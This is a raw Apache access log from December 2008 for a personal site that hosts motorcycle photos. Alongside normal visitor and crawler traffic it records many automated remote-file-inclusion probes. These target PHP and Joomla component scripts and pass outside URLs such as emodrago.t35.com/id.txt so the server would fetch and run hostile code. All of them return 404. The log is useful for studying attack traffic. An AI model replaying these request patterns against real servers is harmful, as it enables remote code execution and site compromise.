62.73.172.126 - - [08/Dec/2008:10:57:46 -0800] "GET /admin/index.php?o=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:10:58:13 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/trackback/ HTTP/1.1" 200 9751 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
62.73.172.126 - - [08/Dec/2008:10:58:19 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:28 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:28 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:29 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:31 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:31 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:32 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:34 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:35 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:36 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:37 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:39 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
64.34.171.39 - - [08/Dec/2008:10:58:40 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:10:58:40 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:10:58:40 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:40 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:41 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:43 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:44 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:45 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:53 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
64.34.171.39 - - [08/Dec/2008:10:58:54 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:55 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:58:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
213.92.190.130 - - [08/Dec/2008:10:59:25 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.190.130 - - [08/Dec/2008:10:59:25 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.190.130 - - [08/Dec/2008:10:59:25 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.190.130 - - [08/Dec/2008:10:59:26 -0800] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:59:37 -0800] "GET /logs/access_080506.log//modules/4nAlbum/public/displayCategory.php?basepath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:59:37 -0800] "GET /logs/access_080508.log//modules/4nAlbum/public/displayCategory.php?basepath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:10:59:40 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:41 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:41 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:45 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:48 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:52 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:55 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:59:56 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:59:56 -0800] "GET /logs/access_080504.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:59:56 -0800] "GET /logs/access_080705.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:59 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:10:59:59 -0800] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
205.145.16.20 - - [08/Dec/2008:11:00:01 -0800] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zango 10.3.37.0)" "dmulk.com"
89.111.176.118 - - [08/Dec/2008:11:00:44 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:11:00:44 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:00:46 -0800] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:00:46 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:00:49 -0800] "GET /logs/access_080919.log///vwar/backup/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:00:49 -0800] "GET //vwar/backup/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:00:49 -0800] "GET /logs///vwar/backup/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:01:01 -0800] "GET /logs/access_080504.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:01:01 -0800] "GET /logs/access_080705.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.92.190.130 - - [08/Dec/2008:11:01:04 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:05 -0800] "GET /logs/access_080929.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:06 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:07 -0800] "GET /logs/access_080601.log/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:01:09 -0800] "GET /logs/access_080705.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:01:09 -0800] "GET /logs/access_080504.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:01:09 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.92.190.130 - - [08/Dec/2008:11:01:13 -0800] "GET /logs/access_080320.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:11:01:14 -0800] "GET /logs/access_080901.log//content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:28 -0800] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:29 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:11:01:29 -0800] "GET /logs/access_080505.log//content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:01:49 -0800] "GET /logs/access_080601.log/components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.22.153 - - [08/Dec/2008:11:02:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:02:18 -0800] "GET /logs/access_080322.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:02:34 -0800] "GET /logs/access_080816.log///vwar/backup/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:11:02:41 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:11:02:42 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:02:42 -0800] "GET /logs/access_080515.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:02:42 -0800] "GET /logs/access_080419.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.73.159.237 - - [08/Dec/2008:11:03:18 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.6.22.153 - - [08/Dec/2008:11:03:28 -0800] "GET /logs/access_080703.log HTTP/1.0" 200 1310720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:03:30 -0800] "GET /logs/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:03:30 -0800] "GET /logs/access_080223.log/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:03:30 -0800] "GET /errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
80.55.171.90 - - [08/Dec/2008:11:03:30 -0800] "GET /logs/access_080828.log/errors.php?error=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:11:03:34 -0800] "GET /frame.php?framefile=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.140.133 - - [08/Dec/2008:11:03:34 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.140.133 - - [08/Dec/2008:11:03:34 -0800] "GET /logs/access_071214.log///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.140.133 - - [08/Dec/2008:11:03:34 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:03:38 -0800] "GET /logs/access_080513.log/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:03:38 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.32.79 - - [08/Dec/2008:11:03:43 -0800] "GET /logs/access_071214.log///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
